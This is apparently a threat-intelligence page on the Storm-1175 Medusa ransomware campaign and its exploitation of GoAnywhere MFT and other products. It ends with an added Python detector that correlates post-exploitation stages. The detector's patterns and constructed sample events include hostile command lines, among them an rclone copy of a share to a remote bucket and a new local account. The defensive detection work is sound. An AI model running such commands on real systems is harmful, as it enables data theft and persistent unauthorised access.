Storm-1175 high-velocity exploit campaign
Campaign
Summary
Storm-1175 is running a high-velocity exploit campaign that rapidly turns initial access into Medusa ransomware deployment, creating risk of data exfiltration and encryption-driven outages. The group is now tied to CVE-2025-10035 in Fortra GoAnywhere Managed File Transfer (MFT), a critical deserialization flaw rated CVSS 10.0 that Microsoft says is being actively exploited in ransomware attacks. According to Microsoft, Storm-1175 first used the flaw as a zero-day on September 11, and Fortra patched it on September 18. Post-exploitation activity included SimpleHelp, MeshAgent, mstsc.exe, Rclone, lateral movement, and a Cloudflare tunnel for command-and-control.
Related Happenings
Microsoft Defender zero-days exploited in attacks (multiple vulnerabilities)
Vulnerability
First: 21.05.2026 10:49
Last: 21.05.2026 10:49
Sources 1
About this happening:
Microsoft began rolling out fixes for **CVE-2026-41091** and **CVE-2026-45498**, two **actively exploited zero-days** in **Microsoft Defender** components that affect unpatched Wi...
Vulnerability exploitation overtakes credentials as top breach entry path
Target Trend
First: 20.05.2026 11:40
Last: 20.05.2026 11:40
Sources 1
About this happening:
**Vulnerability exploitation** became the top initial access vector for **data breaches** over the past year, displacing **compromised credentials** and signaling a major shift in...
Verizon 2026 DBIR shows vulnerability exploitation as the top breach access trend in 2025
Target Trend
First: 20.05.2026 03:04
Last: 20.05.2026 03:04
Sources 1
About this happening:
**Vulnerability exploitation** became the leading breach access vector in **2025**, increasing compromise risk across **31,000 incidents** and **22,000+ confirmed breaches**. **Un...
Fox Tempest's malware-signing service scales trusted-signed malware for ransomware gangs
Threat Actor Meta
First: 20.05.2026 00:47
Last: 20.05.2026 00:47
Sources 1
About this happening:
Microsoft disrupted **Fox Tempest**'s **malware-signing service** in **May 2026**, cutting off a criminal platform that helped ransomware gangs and other cybercriminals obtain tru...
Storm-2949 Microsoft 365 and Azure data-theft campaign
Campaign
First: 19.05.2026 22:35
Last: 19.05.2026 22:35
Sources 1
About this happening:
The **Storm-2949** campaign is targeting **Microsoft 365 and Azure production environments** to steal sensitive data, increasing the risk of privileged-account takeover and cloud...
Timeline
- 06.04.2026 19:56 · 3 articles · 1mo ago
Storm-1175 high-velocity Medusa ransomware campaign
Technical Analysis Update: Microsoft says Storm-1175, a China-based financially motivated cybercriminal group linked to Medusa ransomware, is rapidly weaponizing n-day and zero-day flaws, sometimes within 24 hours of disclosure and sometimes before patches are released. The operators chain multiple exploits with new user account creation, remote monitoring and management (RMM) software deployment, credential theft, and security software disabling to move from initial access to data exfiltration and Medusa ransomware deployment. Recent activity has affected healthcare, education, professional services, and finance organizations in Australia, the United Kingdom, and the United States, with exploited products including GoAnywhere MFT, SmarterMail, Microsoft Exchange, PaperCut, Ivanti Connect Secure and Policy Secure, ConnectWise ScreenConnect, JetBrains TeamCity, SimpleHelp, CrushFTP, and BeyondTrust.
- Microsoft links Medusa ransomware affiliate to zero-day attacks — www.bleepingcomputer.com — 06.04.2026 19:56
- Microsoft: Critical GoAnywhere Bug Exploited in Medusa Ransomware Campaign — www.infosecurity-magazine.com — 07.10.2025 11:45
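The campaign summary and the technical analysis update above describe a chain of post-exploitation stages (new account creation, RMM deployment, RDP, Rclone exfiltration, Cloudflare tunnel). The following added example, not code from Microsoft or the cited articles, correlates those stages per host over constructed process-creation events; the event format, the command-line markers, and the `cloudflared` binary name are assumptions.

```python
"""Stage-correlation detector for the Storm-1175 post-exploitation chain.

Added example, not Microsoft's or the source articles' code. Event format and
sample lines are constructed; tool names come from the campaign summary.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Each stage maps to marker groups; every substring in a group must appear.
STAGE_MARKERS = {
    "account_creation": [("net", "user", "/add")],       # assumed marker for new local accounts
    "rmm_deployment": [("simplehelp",), ("meshagent",)],
    "rdp_lateral": [("mstsc.exe",)],
    "exfiltration": [("rclone",)],
    "c2_tunnel": [("cloudflared",)],                    # assumed Cloudflare tunnel binary name
}

def classify(cmdline: str):
    """Return the chain stage a command line matches, or None."""
    c = cmdline.lower()
    for stage, groups in STAGE_MARKERS.items():
        if any(all(m in c for m in group) for group in groups):
            return stage
    return None

def correlate(events, window=timedelta(hours=24), min_stages=2):
    """Flag hosts where >= min_stages distinct stages occur inside one sliding
    window. Returns {host: [stages in time order]} for the longest chain seen."""
    per_host = defaultdict(list)
    for ev in events:
        stage = classify(ev["cmdline"])
        if stage:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))
    hits = {}
    for host, items in per_host.items():
        items.sort()
        best = []
        for i, (t0, _) in enumerate(items):
            stages = []
            for t, s in items[i:]:
                if t - t0 > window:
                    break
                if s not in stages:
                    stages.append(s)
            if len(stages) > len(best):
                best = stages
        if len(best) >= min_stages:
            hits[host] = best
    return hits

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"host": "files01", "ts": "2025-09-11T02:10:00", "cmdline": "net user helpdesk2 /add"},
    {"host": "files01", "ts": "2025-09-11T02:25:00", "cmdline": r"C:\Windows\Temp\SimpleHelp\Remote Access.exe"},
    {"host": "files01", "ts": "2025-09-11T06:40:00", "cmdline": r"rclone.exe copy D:\share remote:bucket"},
    {"host": "files01", "ts": "2025-09-11T07:00:00", "cmdline": "cloudflared.exe tunnel run"},
    {"host": "ws07", "ts": "2025-09-12T09:00:00", "cmdline": "mstsc.exe /v:fileserver"},
    {"host": "ws07", "ts": "2025-09-20T09:00:00", "cmdline": "rclone.exe ls remote:"},  # outside window
]

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

A single tool sighting (ws07) stays below the threshold; the value is in the ordered chain on files01, which mirrors the sequence the analysis describes.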